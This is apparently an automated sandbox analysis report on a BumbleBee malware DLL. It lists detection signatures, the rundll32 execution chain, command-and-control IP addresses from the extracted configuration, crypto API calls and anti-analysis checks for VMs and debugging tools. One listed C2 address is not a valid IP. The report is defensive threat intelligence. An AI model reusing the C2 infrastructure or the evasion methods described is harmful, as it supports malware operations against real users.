Windows Analysis Report
mount.dll

Overview

General Information

Sample Name: mount.dll
Analysis ID: 622711
MD5: 8e7115ea580f39c152e4d4bc4472c402
SHA1: 4ea1f1d8a01f251fa5db350f72b04a1d11028fb0
SHA256: c65c51ed60f91a92789c4b056821ef51252baa2a1679a6513ab008acf0464ccb

Detection

BumbleBee
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected BumbleBee
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to detect virtual machines
Searches for specific processes (likely to inject)
C2 URLs / IPs found in malware configuration
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
Contains long sleeps (>= 3 min)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 4084 cmdline: loaddll64.exe "C:\Users\user\Desktop\mount.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 4812 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mount.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 640 cmdline: rundll32.exe "C:\Users\user\Desktop\mount.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6016 cmdline: rundll32.exe C:\Users\user\Desktop\mount.dll,shjKeAQfgT MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 4112 cmdline: rundll32.exe "C:\Users\user\Desktop\mount.dll",shjKeAQfgT MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
{"C2 url": ["282.19.133.12:443", "91.122.18.192:443", "185.156.172.62:443", "72.123.65.11:443", "149.255.35.167:443", "172.241.27.146:443"]}
Source | Rule | Description | Author | Strings
00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security
00000002.00000003.333797150.000001B97EC0E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security
00000003.00000003.333897258.0000021EF3D7C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security
00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security
00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security
Source | Rule | Description | Author | Strings
3.2.rundll32.exe.21ef2fe0000.0.raw.unpack | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security
3.2.rundll32.exe.21ef2fe0000.0.unpack | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security
4.2.rundll32.exe.1c3386e0000.2.unpack | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security
4.2.rundll32.exe.1c3386e0000.2.raw.unpack | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 3.2.rundll32.exe.21ef2fe0000.0.unpack | Malware Configuration Extractor: BumbleBee {"C2 url": ["282.19.133.12:443", "91.122.18.192:443", "185.156.172.62:443", "72.123.65.11:443", "149.255.35.167:443", "172.241.27.146:443"]}
Source: mount.dll | Virustotal: Detection: 49%
Source: mount.dll | Metadefender: Detection: 22%
Source: mount.dll | ReversingLabs: Detection: 76%
Source: mount.dll | Avira: detected
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000021EF302F050 CryptExportKey,CryptExportKey
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000021EF302F8B0 CryptAcquireContextW,CryptReleaseContext
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000021EF302F6B0 CryptEnumProvidersW,GetLastError,CryptEnumProvidersW,GetLastError
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000021EF302FCB0 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptGetProvParam,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000021EF3144070 CryptCreateHash
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000021EF302E0B0 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000021EF3030030 CryptEnumProvidersW,CryptEnumProvidersW,GetLastError,GetLastError
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000021EF304DED0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,QueryPerformanceCounter,GetTickCount,GlobalMemoryStatus,GetCurrentProcessId
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000021EF3030380 CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertEnumCertificatesInStore,CertCloseStore,CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000021EF302E300 CryptCreateHash,CryptSetHashParam,CryptSignHashW,CryptDestroyHash
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000021EF3030790 CryptDecrypt
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C33872E300 CryptCreateHash,CryptSetHashParam,CryptSignHashW,CryptDestroyHash
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C338730380 CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertEnumCertificatesInStore,CertCloseStore,CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C33872E660 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C338730700 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C338730790 CryptDecrypt
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C33872FCB0 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptGetProvParam,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C33874DED0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,QueryPerformanceCounter,GetTickCount,GlobalMemoryStatus,GetCurrentProcessId
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C338730030 CryptEnumProvidersW,CryptEnumProvidersW,GetLastError,GetLastError
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C33872E0B0 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C338844070 CryptCreateHash
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C33872F6B0 CryptEnumProvidersW,GetLastError,CryptEnumProvidersW,GetLastError
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C33872F8B0 CryptAcquireContextW,CryptReleaseContext
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C338730A60 CryptCreateHash,CryptSetHashParam,CryptSignHashW,CryptDestroyHash
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C33872ED70 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C33872EE40 CryptAcquireContextW,CryptGetUserKey,CryptReleaseContext
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000001C33872F050 CryptExportKey,CryptExportKey
Source: unknown | HTTPS traffic detected: 185.156.172.62:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.156.172.62:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: mount.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Networking

Source: C:\Windows\System32\rundll32.exe | Network Connect: 91.122.18.192 443
Source: Malware configuration extractor | URLs: 282.19.133.12:443
Source: Malware configuration extractor | URLs: 91.122.18.192:443
Source: Malware configuration extractor | URLs: 185.156.172.62:443
Source: Malware configuration extractor | URLs: 72.123.65.11:443
Source: Malware configuration extractor | URLs: 149.255.35.167:443
Source: Malware configuration extractor | URLs: 172.241.27.146:443
Source: Joe Sandbox View | ASN Name: ROSTELECOM-ASRU ROSTELECOM-ASRU
Source: Joe Sandbox View | ASN Name: M247GB M247GB
Source: Joe Sandbox View | JA3 fingerprint: 0c9457ab6f0d6a14fc8a3d1d149547fb
Source: global traffic | HTTP traffic detected: GET /gates HTTP/1.1
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 91.122.18.192
Source: unknown | TCP traffic detected without corresponding DNS query: 185.156.172.62
Source: rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.openssl.org/docs/faq.html
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000021EF2FF3170 WSASetLastError,WSARecv,WSAGetLastError
Source: unknown | HTTPS traffic detected: 185.156.172.62:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.156.172.62:443 -> 192.168.2.4:49774 version: TLS 1.2

E-Banking Fraud

Source: Yara match | File source: 3.2.rundll32.exe.21ef2fe0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.21ef2fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.1c3386e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.1c3386e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.333797150.000001B97EC0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.333897258.0000021EF3D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6016, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 640, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4112, type: MEMORYSTR
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387528D04_2_000001C3387528D0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387568A34_2_000001C3387568A3
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387989504_2_000001C338798950
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33881FA004_2_000001C33881FA00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33873D9904_2_000001C33873D990
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387619904_2_000001C338761990
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338759A404_2_000001C338759A40
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338751A004_2_000001C338751A00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338753A9A4_2_000001C338753A9A
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338751B604_2_000001C338751B60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875FB604_2_000001C33875FB60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E9B304_2_000001C3386E9B30
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875BB104_2_000001C33875BB10
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338717BB04_2_000001C338717BB0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33873DBA04_2_000001C33873DBA0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338759C604_2_000001C338759C60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338717C604_2_000001C338717C60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33873DC404_2_000001C33873DC40
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338753C004_2_000001C338753C00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33873DC004_2_000001C33873DC00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386F5CD04_2_000001C3386F5CD0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872FCB04_2_000001C33872FCB0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338761C904_2_000001C338761C90
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875FC804_2_000001C33875FC80
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338757D204_2_000001C338757D20
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338751D094_2_000001C338751D09
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875DD104_2_000001C33875DD10
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338825E3C4_2_000001C338825E3C
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338791D804_2_000001C338791D80
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338821E604_2_000001C338821E60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874DED04_2_000001C33874DED0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338713E704_2_000001C338713E70
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875FF604_2_000001C33875FF60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E3F304_2_000001C3386E3F30
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338761EF04_2_000001C338761EF0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387920504_2_000001C338792050
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338751FE54_2_000001C338751FE5
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875BFF04_2_000001C33875BFF0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387520E04_2_000001C3387520E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387400C04_2_000001C3387400C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E40904_2_000001C3386E4090
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386EC0A04_2_000001C3386EC0A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387601304_2_000001C338760130
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387631E04_2_000001C3387631E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387411704_2_000001C338741170
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387972304_2_000001C338797230
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387552074_2_000001C338755207
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874F2934_2_000001C33874F293
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33873D2704_2_000001C33873D270
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33877D3104_2_000001C33877D310
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875F3E04_2_000001C33875F3E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387653C04_2_000001C3387653C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387533704_2_000001C338753370
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875D4A04_2_000001C33875D4A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387574704_2_000001C338757470
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387015504_2_000001C338701550
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387535414_2_000001C338753541
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387555414_2_000001C338755541
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387635104_2_000001C338763510
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387595A04_2_000001C3387595A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875B5A04_2_000001C33875B5A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387835904_2_000001C338783590
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387556304_2_000001C338755630
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33873D6C04_2_000001C33873D6C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387336A04_2_000001C3387336A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E76A04_2_000001C3386E76A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387576904_2_000001C338757690
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387436704_2_000001C338743670
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E37604_2_000001C3386E3760
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875F7304_2_000001C33875F730
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875D6F04_2_000001C33875D6F0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387618204_2_000001C338761820
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E98194_2_000001C3386E9819
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872F8B04_2_000001C33872F8B0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E990A4_2_000001C3386E990A
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387558F04_2_000001C3387558F0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387949C04_2_000001C3387949C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875EA404_2_000001C33875EA40
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338760A304_2_000001C338760A30
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33877EAD04_2_000001C33877EAD0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872EB604_2_000001C33872EB60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33881EA8C4_2_000001C33881EA8C
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338752BE04_2_000001C338752BE0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338756B834_2_000001C338756B83
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338758B904_2_000001C338758B90
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338762B904_2_000001C338762B90
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33876EB704_2_000001C33876EB70
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338734C004_2_000001C338734C00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874ECA04_2_000001C33874ECA0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338832D484_2_000001C338832D48
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338760CF04_2_000001C338760CF0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33878ED904_2_000001C33878ED90
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338742E604_2_000001C338742E60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338752E104_2_000001C338752E10
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338726E104_2_000001C338726E10
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874EE004_2_000001C33874EE00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33876CE004_2_000001C33876CE00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875EE004_2_000001C33875EE00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338814F384_2_000001C338814F38
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338754F604_2_000001C338754F60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387E6F104_2_000001C3387E6F10
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33877EF104_2_000001C33877EF10
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874EFAA4_2_000001C33874EFAA
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872F0504_2_000001C33872F050
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387350304_2_000001C338735030
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33871D0D04_2_000001C33871D0D0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E915A4_2_000001C3386E915A
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875F1304_2_000001C33875F130
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387591004_2_000001C338759100
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387611004_2_000001C338761100
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387530F04_2_000001C3387530F0
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C338725750 appears 299 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021EF3025A40 appears 44 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C338725700 appears 66 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021EF3025750 appears 250 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021EF3035B10 appears 47 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C33880A1B0 appears 35 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C3387222D0 appears 286 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C33880C220 appears 699 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021EF3025700 appears 58 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C338725A40 appears 50 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021EF310C220 appears 590 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021EF30222D0 appears 229 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C338735B10 appears 47 times
                    Source: mount.dll Virustotal: Detection: 49%
                    Source: mount.dll Metadefender: Detection: 22%
                    Source: mount.dll ReversingLabs: Detection: 76%
                    Source: mount.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\mount.dll"
                    Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mount.dll",#1
                    Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mount.dll,shjKeAQfgT
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mount.dll",#1
                    Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mount.dll",shjKeAQfgT
                    Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                    Source: classification engine Classification label: mal100.troj.evad.winDLL@9/0@0/2
                    Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000021EF30211C0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoUninitialize,SysAllocString,SysFreeString,SysFreeString,CoSetProxyBlanket,CoUninitialize
                    Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000021EF30210E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,StrCmpIW,Process32NextW,CloseHandle,FindCloseChangeNotification
                    Source: rundll32.exe String found in binary or memory: Originator-Return-Address
                    Source: rundll32.exe String found in binary or memory: id-cmc-addExtensions
                    Source: rundll32.exe String found in binary or memory: Accept-Additions
                    Source: rundll32.exe String found in binary or memory: MMHS-Exempted-Address
                    Source: rundll32.exe String found in binary or memory: List-Help
                    Source: rundll32.exe String found in binary or memory: set-addPolicy
                    Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: mount.dll Static PE information: Image base 0x180000000 > 0x60000000
                    Source: mount.dll Static file information: File size 3846656 > 1048576
                    Source: mount.dll Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1f3000
                    Source: mount.dll Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1b1200
                    Source: mount.dll Static PE information: DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                    Source: mount.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000021EF31443B0 push rax; retf 3_2_0000021EF3144401
                    Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000021EF31443B8 push rax; retf 3_2_0000021EF3144401
                    Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000021EF31443D0 push rax; retf 3_2_0000021EF3144401
                    Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000021EF31443C0 push rax; retf 3_2_0000021EF3144401
                    Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000021EF31443C8 push rax; retf 3_2_0000021EF3144401
                    Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000001C3388443B0 push rax; retf 4_2_000001C338844401
                    Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000001C3388443B8 push rax; retf 4_2_000001C338844401
                    Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000001C3388443C0 push rax; retf 4_2_000001C338844401
                    Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000001C3388443C8 push rax; retf 4_2_000001C338844401
                    Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000001C3388443D0 push rax; retf 4_2_000001C338844401
                    Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000021EF3017D40 LoadLibraryA,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueA,CloseHandle,GetProcAddress,CloseHandle
                    Source: C:\Windows\System32\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\System32\rundll32.exe File opened: HKEY_CURRENT_USER\SOFTWARE\Wine
                    Source: C:\Windows\System32\rundll32.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: rundll32.exe Binary or memory string: PROCMON.EXE
                    Source: rundll32.exe Binary or memory string: HOOKEXPLORER.EXE
                    Source: rundll32.exe Binary or memory string: JOEBOXSERVER.EXE
                    Source: rundll32.exe Binary or memory string: AUTORUNSC.EXE
                    Source: rundll32.exe Binary or memory string: OLLYDBG.EXE
